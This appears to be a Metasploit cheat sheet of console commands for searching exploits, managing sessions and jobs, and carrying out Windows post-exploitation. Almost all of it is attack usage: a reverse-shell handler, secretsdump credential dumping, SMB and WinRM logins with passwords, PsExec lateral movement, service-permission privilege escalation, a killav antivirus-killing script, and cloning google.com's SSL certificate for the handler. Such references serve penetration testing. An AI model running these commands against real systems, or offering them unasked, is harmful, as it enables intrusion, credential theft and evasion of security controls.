Core
Modules - Post
Modules - Auxiliary
Plugins
Meterpreter
Database
Modules - Privilege Escalation

Search

msf> search platform:windows port:135 target:XP type:exploit
#list available keywords
msf> help search

Modules

#navigate through different active modules
use exploit/multi/handler
#push module on stack
pushm
use ...
#list stack
listm
[*] Module stack:
[1]     post/multi/recon/local_exploit_suggester
[0]     exploit/multi/handler
#go to previous module and delete it from the stack
popm

Jobs

#List Jobs
jobs -l
#Kill all Jobs
jobs -K
#Kill single Job by ID
jobs -k 1

Run in Background

use exploit/multi/handler
run -p windows/shell/reverse_tcp lhost=0.0.0.0 lport=443 -j

RHosts

set RHOSTS file:/home/user/iplist.txt

Impacket Secretsdump

use scanner/smb/impacket/secretsdump
set RHOSTS 192.168.1.1
set SMBDOMAIN domain
set SMBUSER user
set SMBPASS pass

SMB Login

use scanner/smb/smb_login
auxiliary(scanner/smb/smb_login) > run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username
sessions -i 1

Custom SSL

Run the impersonate_ssl module (see "Impersonate SSL" below) and point the handler at the generated certificate:

set HandlerSSLCert /home/path/cert.pem
set StagerVerifySSLCert true
run

Sessions

#List Sessions
sessions
#Select Session
sessions -i 1

Plugins

List available plugins

load -l

Run Meterpreter script

meterpreter > run scriptname

Scriptname          Action
checkvm             check if target system is a VM
getcountermeasure   checks security settings
getgui              try to enable RDP
get_local_subnets   list local subnets
gettelnet           enable telnet
hostsedit           edit the hosts file
killav              try to kill antivirus
remotewinenum       enumerate system information
scraper             enumerate more system information
winenum             detailed windows enumeration

WinRM Login

use scanner/winrm/winrm_login
run CreateSession=true RHOSTS=172.14.2.164 SMBDomain=windomain.local SMBPass=password SMBUser=username

Impersonate SSL

use auxiliary/gather/impersonate_ssl
set RHOSTS www.google.com
set ADD_CN true
set ADD_SAN true
run

Alias

load alias
alias s set
alias sg setg

Wiki

load wiki
Wiki Commands
=============
dokuwiki          Outputs data from the current workspace in dokuwiki markup.
mediawiki         Outputs data from the current workspace in mediawiki markup.

Service

use exploit/windows/local/service_permissions
run lhost=0.0.0.0 lport=12222

UAC Enumeration

use post/windows/gather/win_privs
set SESSION 1

Local Exploit Suggester

use post/multi/recon/local_exploit_suggester
set SESSION 1

PsExec

use exploit/windows/smb/psexec
set rhost 127.0.0.1
set smbuser mega-admin
set smbpass p4ss
run

Upgrade Shell to Meterpreter

use post/multi/manage/shell_to_meterpreter
set SESSION 1

Database

Initialize a database with msfdb init. A database with user and password will be generated.

Database nmap

msf6 > db_connect user:pass@localhost/msf
msf6 > db_status
msf6 > workspace
msf6 > workspace -a new_ws
msf6 > db_nmap -sP 192.168.2.0/24
msf6 > hosts
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > hosts -R
msf6 auxiliary(scanner/portscan/tcp) > run